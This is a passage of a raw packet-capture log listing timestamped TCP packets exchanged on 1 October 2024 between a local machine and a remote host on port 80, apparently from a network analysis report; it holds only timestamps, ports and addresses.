                          Oct 1, 2024 07:38:14.896995068 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897007942 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897018909 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897036076 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897044897 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897061110 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897063017 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897075891 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897089958 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897090912 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897104979 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897104979 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897119999 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897125006 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897145987 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897150040 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897161007 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897171974 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897177935 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897192001 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897197008 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897217035 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897222042 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897239923 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897248030 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897255898 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897264957 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897279978 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897283077 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897294998 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897301912 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897304058 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897310972 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897317886 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897325993 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897391081 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897392035 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897406101 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897422075 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897445917 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897454023 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897454023 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897471905 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897475958 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897485971 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897502899 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897505999 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897505999 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897519112 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897542953 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897548914 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897548914 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897556067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897557974 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897573948 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897584915 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897588015 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897598982 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897604942 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897640944 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897640944 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897651911 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897701979 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897715092 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897737980 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897748947 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897753954 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897768021 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897783041 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897795916 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897799015 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897814989 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897830963 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897838116 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897846937 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897861958 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897876978 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897892952 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897896051 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897902012 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897912979 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897928953 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897938013 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897944927 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897953033 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897959948 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897974968 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897978067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897996902 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897996902 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898015022 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898025036 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898030043 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898045063 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898052931 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898060083 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898075104 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898094893 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898113966 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898150921 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898165941 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898180962 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898190022 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898196936 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898212910 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898214102 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898232937 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898241997 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898257017 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898282051 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898417950 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898432970 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898447990 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898463011 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898464918 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898474932 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898478985 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898492098 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898497105 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898508072 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898515940 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898523092 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898538113 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898540020 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898561001 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898566961 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898577929 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898591995 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898592949 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898607969 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898612976 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898622036 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898638010 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898641109 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898667097 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898679018 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898686886 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898694992 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898710012 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898724079 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898725033 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898732901 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898741961 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898753881 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898760080 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898772001 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898787975 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898807049 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.940452099 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940479040 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940495014 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940562010 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.940572977 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940587997 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940598011 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.940603971 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940618992 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940633059 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940649986 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.940673113 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985284090 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985312939 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985328913 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985343933 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985368013 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985383987 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985399008 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985421896 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985436916 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985462904 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985477924 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985491991 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985507965 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985522985 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985538960 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985553980 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985558987 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985558987 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985558987 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985558987 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985569954 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985583067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985583067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985583067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985583067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985583067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985585928 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985596895 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985596895 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985605955 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985614061 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985637903 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985640049 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985649109 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985661983 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985677004 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985691071 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985692024 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985707045 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985718966 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985729933 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985744953 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985743046 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985743046 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985760927 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985778093 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985778093 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985795021 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985800982 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985806942 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985814095 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985819101 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985841990 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985846996 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985857010 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985868931 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985872030 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985882998 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985888004 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985905886 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985910892 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985913038 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985918999 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985924959 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985940933 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985955954 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985960960 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985979080 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985992908 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985996962 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986010075 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986015081 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986026049 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986041069 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986049891 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986063957 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986066103 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986082077 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986092091 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986097097 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986114025 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986124039 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986124039 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986141920 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986157894 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986165047 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986179113 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986195087 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986205101 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986208916 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986224890 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986234903 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986234903 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986243010 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986255884 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986265898 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986284971 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986331940 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986346960 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986361980 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986371994 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986375093 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986391068 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986394882 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986407042 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986418962 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986423016 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986438036 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986438990 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986454964 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986464977 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986470938 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986485958 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986488104 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986515045 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986540079 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986541033 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986562967 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986578941 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986581087 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986593008 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986608028 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986618042 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986618042 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986623049 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.163918018 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.163928032 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.163935900 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.163944960 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.163955927 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.163964033 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.163975954 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.163981915 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.163995028 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164011002 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164011955 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164025068 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164036989 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164053917 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164055109 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164069891 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164077997 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164098024 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164100885 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164107084 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164119005 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164138079 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164153099 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164156914 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164175034 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164175987 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164184093 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164200068 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164201975 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164216995 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164221048 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164239883 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164246082 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164258003 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164263010 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164278030 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164280891 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164297104 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164298058 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164311886 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164325953 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164339066 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164344072 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164362907 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164366961 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164378881 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164380074 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164397955 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164400101 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164417982 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164423943 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164436102 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164437056 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164455891 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164458990 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164477110 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164477110 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164489985 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164503098 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164519072 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164532900 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164541960 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164560080 CEST8049704192.210.215.11192.168.2.8
